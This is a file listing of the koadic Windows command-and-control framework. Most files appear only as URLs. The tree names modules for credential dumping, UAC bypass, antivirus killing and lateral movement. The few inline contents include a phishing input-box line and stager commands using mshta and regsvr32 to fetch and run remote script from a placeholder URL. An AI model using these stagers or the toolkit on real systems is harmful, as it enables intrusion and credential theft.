├── .gitignore ├── LICENSE ├── README.md ├── core ├── __init__.py ├── cidr.py ├── colors.py ├── commands │ ├── __init__.py │ ├── cmdshell.py │ ├── exit.py │ ├── help.py │ ├── info.py │ ├── jobs.py │ ├── kill.py │ ├── listeners.py │ ├── load.py │ ├── run.py │ ├── set.py │ ├── use.py │ └── zombies.py ├── extant.py ├── handler.py ├── implant.py ├── job.py ├── linter.py ├── loader.py ├── mappings.py ├── options.py ├── payload.py ├── plugin.py ├── server.py ├── session.py ├── shell.py └── stager.py ├── data ├── banner.txt ├── bin │ ├── dynwrapx.dll │ ├── dynwrapx.manifest │ ├── mimishim.dll │ ├── mimishim.x64.dll │ ├── mimishim │ │ ├── .gitignore │ │ ├── README.md │ │ ├── ReflectiveDLLInjection │ │ │ ├── .gitignore │ │ │ ├── LICENSE.txt │ │ │ ├── Readme.md │ │ │ ├── dll │ │ │ │ ├── koadic_load.c │ │ │ │ ├── koadic_load.h │ │ │ │ ├── koadic_net.c │ │ │ │ ├── koadic_net.h │ │ │ │ ├── koadic_process.c │ │ │ │ ├── koadic_process.h │ │ │ │ ├── koadic_types.h │ │ │ │ ├── koadic_util.c │ │ │ │ ├── koadic_util.h │ │ │ │ ├── metasploit │ │ │ │ │ ├── metasploit_inject.c │ │ │ │ │ ├── metasploit_inject.h │ │ │ │ │ ├── metasploit_loader.c │ │ │ │ │ ├── metasploit_loader.h │ │ │ │ │ ├── metasploit_ps.c │ │ │ │ │ └── metasploit_ps.h │ │ │ │ ├── mimishim.filters │ │ │ │ ├── mimishim.sln │ │ │ │ ├── mimishim.vcproj │ │ │ │ ├── mimishim.vcxproj │ │ │ │ └── src │ │ │ │ │ ├── ReflectiveDLLInjection.h │ │ │ │ │ ├── ReflectiveDll.c │ │ │ │ │ ├── ReflectiveLoader.c │ │ │ │ │ └── ReflectiveLoader.h │ │ │ ├── inject │ │ │ │ ├── inject.sln │ │ │ │ ├── inject.vcproj │ │ │ │ ├── inject.vcxproj │ │ │ │ ├── inject.vcxproj.filters │ │ │ │ └── src │ │ │ │ │ ├── GetProcAddressR.c │ │ │ │ │ ├── GetProcAddressR.h │ │ │ │ │ ├── Inject.c │ │ │ │ │ ├── LoadLibraryR.c │ │ │ │ │ ├── LoadLibraryR.h │ │ │ │ │ └── ReflectiveDLLInjection.h │ │ │ └── rdi.sln │ │ ├── emu │ │ │ ├── powerkatz32.py │ │ │ └── powerkatz64.py │ │ └── server.py │ ├── powerkatz32.dll │ └── powerkatz64.dll ├── implant │ ├── elevate │ │ ├── bypassuac_eventvwr.js │ │ ├── bypassuac_eventvwr.vbs │ │ └── bypassuac_sdclt.js │ ├── fun │ │ ├── thunderstruck.vbs │ │ ├── voice.js │ │ └── voice.vbs │ ├── gather │ │ ├── clipboard.js │ │ ├── clipboard.vbs │ │ ├── enum_printers.js │ │ ├── enum_shares.js │ │ ├── enum_users.js │ │ ├── enum_users.js.old │ │ ├── hashdump_dc.js │ │ └── hashdump_sam.js │ ├── inject │ │ ├── mimikatz_dotnet2js.js │ │ ├── mimikatz_dynwrapx.js │ │ ├── reflectdll_excel.js │ │ ├── shellcode.vba │ │ ├── shellcode_dynwrapx.js │ │ └── shellcode_excel.js │ ├── manage │ │ ├── enable_rdesktop.js │ │ ├── enable_rdesktop.vbs │ │ ├── exec_cmd.js │ │ ├── exec_cmd.vbs │ │ └── killav.vbs │ ├── phish │ │ └── password_box.vbs │ ├── pivot │ │ ├── exec_psexec.js │ │ ├── exec_wmi.js │ │ └── exec_wmi.vbs │ ├── scan │ │ ├── tcp.js │ │ └── tcp.vbs │ └── util │ │ ├── download_file.js │ │ ├── download_file.vbs │ │ ├── upload_file.js │ │ └── upload_file.vbs └── stager │ ├── js │ ├── disk │ │ └── disk.cmd │ ├── mshta │ │ ├── mshta.cmd │ │ └── template.hta │ ├── mshtajs │ │ └── mshtajs.cmd │ ├── regsvr │ │ ├── regsvr.cmd │ │ └── template.sct │ ├── rundll32 │ │ └── rundll32.cmd │ ├── rundll32_js │ │ └── rundll32_js.cmd │ ├── stage.js │ └── stdlib.js │ └── vbscript │ ├── disk.cmd │ ├── mshta.cmd │ ├── stdlib.vbs │ └── work.vbs ├── koadic ├── modules ├── implant │ ├── elevate │ │ ├── bypassuac_eventvwr.py │ │ └── bypassuac_sdclt.py │ ├── fun │ │ ├── cranberry.py │ │ └── voice.py │ ├── gather │ │ ├── clipboard.py │ │ ├── enum_printers.py │ │ ├── enum_shares.py │ │ ├── enum_users.py │ │ ├── hashdump_dc.py │ │ ├── hashdump_sam.py │ │ ├── office_key.py │ │ └── windows_key.py │ ├── inject │ │ ├── mimikatz_dotnet2js.py │ │ ├── mimikatz_dynwrapx.py │ │ ├── reflectdll_excel.py │ │ ├── shellcode_dynwrapx.py │ │ └── shellcode_excel.py │ ├── manage │ │ ├── enable_rdesktop.py │ │ ├── exec_cmd.py │ │ └── killav.py │ ├── phish │ │ └── password_box.py │ ├── pivot │ │ ├── exec_psexec.py │ │ ├── exec_wmi.py │ │ ├── exec_wmic.py │ │ └── stage_wmi.py │ ├── scan │ │ └── tcp.py │ └── util │ │ ├── download_file.py │ │ └── upload_file.py └── stager │ ├── js │ ├── disk.py │ ├── mshta.py │ ├── regsvr.py │ └── rundll32_js.py │ ├── jscript.py │ ├── powershell.py │ └── vbscript.py └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/.gitignore -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/README.md -------------------------------------------------------------------------------- /core/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /core/cidr.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/cidr.py -------------------------------------------------------------------------------- /core/colors.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/colors.py -------------------------------------------------------------------------------- /core/commands/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /core/commands/cmdshell.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/cmdshell.py -------------------------------------------------------------------------------- /core/commands/exit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/exit.py -------------------------------------------------------------------------------- /core/commands/help.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/help.py -------------------------------------------------------------------------------- /core/commands/info.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/info.py -------------------------------------------------------------------------------- /core/commands/jobs.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/jobs.py -------------------------------------------------------------------------------- /core/commands/kill.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/kill.py -------------------------------------------------------------------------------- /core/commands/listeners.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/listeners.py -------------------------------------------------------------------------------- /core/commands/load.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/load.py -------------------------------------------------------------------------------- /core/commands/run.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/run.py -------------------------------------------------------------------------------- /core/commands/set.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/set.py -------------------------------------------------------------------------------- /core/commands/use.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/use.py -------------------------------------------------------------------------------- /core/commands/zombies.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/commands/zombies.py -------------------------------------------------------------------------------- /core/extant.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/extant.py -------------------------------------------------------------------------------- /core/handler.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/handler.py -------------------------------------------------------------------------------- /core/implant.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/implant.py -------------------------------------------------------------------------------- /core/job.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/job.py -------------------------------------------------------------------------------- /core/linter.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/linter.py -------------------------------------------------------------------------------- /core/loader.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/loader.py -------------------------------------------------------------------------------- /core/mappings.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/mappings.py -------------------------------------------------------------------------------- /core/options.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/options.py -------------------------------------------------------------------------------- /core/payload.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/payload.py -------------------------------------------------------------------------------- /core/plugin.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/plugin.py -------------------------------------------------------------------------------- /core/server.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/server.py -------------------------------------------------------------------------------- /core/session.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/session.py -------------------------------------------------------------------------------- /core/shell.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/shell.py -------------------------------------------------------------------------------- /core/stager.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/core/stager.py -------------------------------------------------------------------------------- /data/banner.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/banner.txt -------------------------------------------------------------------------------- /data/bin/dynwrapx.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/dynwrapx.dll -------------------------------------------------------------------------------- /data/bin/dynwrapx.manifest: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/dynwrapx.manifest -------------------------------------------------------------------------------- /data/bin/mimishim.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim.dll -------------------------------------------------------------------------------- /data/bin/mimishim.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim.x64.dll -------------------------------------------------------------------------------- /data/bin/mimishim/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/.gitignore -------------------------------------------------------------------------------- /data/bin/mimishim/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/README.md -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/.gitignore -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/LICENSE.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/LICENSE.txt -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/Readme.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/Readme.md -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_load.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_load.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_load.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_load.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_net.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_net.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_net.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_net.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_types.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_types.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_util.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_util.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_util.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_util.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_inject.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_inject.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_inject.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_inject.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_loader.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_loader.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_loader.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_loader.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_ps.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_ps.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_ps.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/metasploit/metasploit_ps.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.filters: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.filters -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.sln -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.vcproj -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.vcxproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.vcxproj -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveDLLInjection.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveDll.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveDll.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveLoader.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveLoader.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveLoader.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveLoader.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/inject.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/inject/inject.sln -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/inject.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/inject/inject.vcproj -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/inject.vcxproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/inject/inject.vcxproj -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/inject.vcxproj.filters: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/inject/inject.vcxproj.filters -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/src/GetProcAddressR.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/inject/src/GetProcAddressR.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/src/GetProcAddressR.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/inject/src/GetProcAddressR.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/src/Inject.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/inject/src/Inject.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/src/LoadLibraryR.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/inject/src/LoadLibraryR.c -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/src/LoadLibraryR.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/inject/src/LoadLibraryR.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/src/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/inject/src/ReflectiveDLLInjection.h -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/rdi.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/ReflectiveDLLInjection/rdi.sln -------------------------------------------------------------------------------- /data/bin/mimishim/emu/powerkatz32.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/emu/powerkatz32.py -------------------------------------------------------------------------------- /data/bin/mimishim/emu/powerkatz64.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/emu/powerkatz64.py -------------------------------------------------------------------------------- /data/bin/mimishim/server.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/mimishim/server.py -------------------------------------------------------------------------------- /data/bin/powerkatz32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/powerkatz32.dll -------------------------------------------------------------------------------- /data/bin/powerkatz64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/bin/powerkatz64.dll -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_eventvwr.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/elevate/bypassuac_eventvwr.js -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_eventvwr.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/elevate/bypassuac_eventvwr.vbs -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_sdclt.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/elevate/bypassuac_sdclt.js -------------------------------------------------------------------------------- /data/implant/fun/thunderstruck.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/fun/thunderstruck.vbs -------------------------------------------------------------------------------- /data/implant/fun/voice.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/fun/voice.js -------------------------------------------------------------------------------- /data/implant/fun/voice.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/fun/voice.vbs -------------------------------------------------------------------------------- /data/implant/gather/clipboard.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/gather/clipboard.js -------------------------------------------------------------------------------- /data/implant/gather/clipboard.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/gather/clipboard.vbs -------------------------------------------------------------------------------- /data/implant/gather/enum_printers.js: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /data/implant/gather/enum_shares.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/gather/enum_shares.js -------------------------------------------------------------------------------- /data/implant/gather/enum_users.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/gather/enum_users.js -------------------------------------------------------------------------------- /data/implant/gather/enum_users.js.old: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/gather/enum_users.js.old -------------------------------------------------------------------------------- /data/implant/gather/hashdump_dc.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/gather/hashdump_dc.js -------------------------------------------------------------------------------- /data/implant/gather/hashdump_sam.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/gather/hashdump_sam.js -------------------------------------------------------------------------------- /data/implant/inject/mimikatz_dotnet2js.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/inject/mimikatz_dotnet2js.js -------------------------------------------------------------------------------- /data/implant/inject/mimikatz_dynwrapx.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/inject/mimikatz_dynwrapx.js -------------------------------------------------------------------------------- /data/implant/inject/reflectdll_excel.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/inject/reflectdll_excel.js -------------------------------------------------------------------------------- /data/implant/inject/shellcode.vba: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/inject/shellcode.vba -------------------------------------------------------------------------------- /data/implant/inject/shellcode_dynwrapx.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/inject/shellcode_dynwrapx.js -------------------------------------------------------------------------------- /data/implant/inject/shellcode_excel.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/inject/shellcode_excel.js -------------------------------------------------------------------------------- /data/implant/manage/enable_rdesktop.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/manage/enable_rdesktop.js -------------------------------------------------------------------------------- /data/implant/manage/enable_rdesktop.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/manage/enable_rdesktop.vbs -------------------------------------------------------------------------------- /data/implant/manage/exec_cmd.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/manage/exec_cmd.js -------------------------------------------------------------------------------- /data/implant/manage/exec_cmd.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/manage/exec_cmd.vbs -------------------------------------------------------------------------------- /data/implant/manage/killav.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/manage/killav.vbs -------------------------------------------------------------------------------- /data/implant/phish/password_box.vbs: -------------------------------------------------------------------------------- 1 | a = inputbox("~MESSAGE~") 2 | -------------------------------------------------------------------------------- /data/implant/pivot/exec_psexec.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/pivot/exec_psexec.js -------------------------------------------------------------------------------- /data/implant/pivot/exec_wmi.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/pivot/exec_wmi.js -------------------------------------------------------------------------------- /data/implant/pivot/exec_wmi.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/pivot/exec_wmi.vbs -------------------------------------------------------------------------------- /data/implant/scan/tcp.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/scan/tcp.js -------------------------------------------------------------------------------- /data/implant/scan/tcp.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/scan/tcp.vbs -------------------------------------------------------------------------------- /data/implant/util/download_file.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/util/download_file.js -------------------------------------------------------------------------------- /data/implant/util/download_file.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/util/download_file.vbs -------------------------------------------------------------------------------- /data/implant/util/upload_file.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/util/upload_file.js -------------------------------------------------------------------------------- /data/implant/util/upload_file.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/implant/util/upload_file.vbs -------------------------------------------------------------------------------- /data/stager/js/disk/disk.cmd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/js/disk/disk.cmd -------------------------------------------------------------------------------- /data/stager/js/mshta/mshta.cmd: -------------------------------------------------------------------------------- 1 | mshta ~URL~ 2 | -------------------------------------------------------------------------------- /data/stager/js/mshta/template.hta: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/js/mshta/template.hta -------------------------------------------------------------------------------- /data/stager/js/mshtajs/mshtajs.cmd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/js/mshtajs/mshtajs.cmd -------------------------------------------------------------------------------- /data/stager/js/regsvr/regsvr.cmd: -------------------------------------------------------------------------------- 1 | regsvr32 /s /u /n /i:~URL~ scrobj.dll 2 | -------------------------------------------------------------------------------- /data/stager/js/regsvr/template.sct: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/js/regsvr/template.sct -------------------------------------------------------------------------------- /data/stager/js/rundll32/rundll32.cmd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/js/rundll32/rundll32.cmd -------------------------------------------------------------------------------- /data/stager/js/rundll32_js/rundll32_js.cmd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/js/rundll32_js/rundll32_js.cmd -------------------------------------------------------------------------------- /data/stager/js/stage.js: -------------------------------------------------------------------------------- 